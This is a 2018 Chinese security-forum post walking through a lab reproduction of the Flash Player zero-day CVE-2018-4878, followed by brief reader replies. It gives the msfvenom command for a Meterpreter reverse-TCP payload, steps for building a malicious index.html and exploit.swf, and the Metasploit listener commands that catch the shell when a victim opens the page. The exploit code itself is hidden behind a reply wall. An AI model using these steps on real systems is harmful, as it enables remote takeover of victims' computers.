墨云 发表于 2018-3-13 20:53:03

Flash 0day漏洞(CVE-2018-4878)复现

前言这几天很忙,已经有两天没有更新文章了,最近CVE-2018-4878挺火的,还有群里的人也问这个怎么复现。今天就献丑复现一下,大表哥别喷,虽然我还没研究到这方面的漏洞分析,我会努力的,相信不久我也能写出二进制漏洞分析的文章。该漏洞影响 Flash Player 当前最新版本28.0.0.137以及之前的所有版本,而Adobe公司计划在当地时间2月5日紧急发布更新来修复此漏洞。从Adobe公告致谢来看,这个漏洞的野外攻击样本最早是由韩国计算机应急响应小组(KR-CERT)发现的,而KR-CERT也表示,来自朝鲜的黑客组织已经成功利用这个0Day 漏洞发起攻击。环境攻击机: kali 2018(192.168.59.6)
靶机: Windows 10 x64   (192.168.59.160)
Web服务器: Windows 7 X64(192.168.59.127)复现过程
[*]我们先在kali生成一个python类型的shellcode
msfVENOM -p windows/meterpreter/reverse_tcp LHOST=192.168.59.6 LPORT=6666 -f p ython > /root/shellcode.txt
LHOST就是kali的ip地址,6666端口你可以随便设置,/root/shellcode.txt要生成的文件路径2.替换EXP里面的shellcode3.使用cve-2018-4878.py生成文件,我这里用的是Sublime Text 3 Ctrl+B运行python,会在本目录下生成两个文件index.html,exploit.swf4.然后把这两个文件放到Web服务器里面5.在kali的MSF里面设置监听msf > use exploit/multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 192.168.59.6msf exploit(handler) > set LPORT 6666msf exploit(handler) > exploit6.然后使用靶机的win10 IE访问Web服务器的文件index.htmlcve-2018-4878.py 代码**** Hidden Message *****

格式化、、》 发表于 2018-3-13 21:04:33

我来看看

帽子 发表于 2018-3-13 21:27:05

牛p

ppeehh 发表于 2018-3-13 21:27:40

隐藏内容请回复

鬼门关前抽大烟 发表于 2018-3-13 22:08:09

看看这个洞咋样

mmmm 发表于 2018-3-13 23:12:06

未来研究下啊

天道酬勤 发表于 2018-3-14 00:03:28

我的版主该转正啦

Mars 发表于 2018-3-14 00:33:25

回复看隐藏

[email protected] 发表于 2018-3-14 05:51:38

小花猫 发表于 2018-3-14 08:39:16

{:3_131:}好腻害啊
页: [1] 2 3
查看完整版本: Flash 0day漏洞(CVE-2018-4878)复现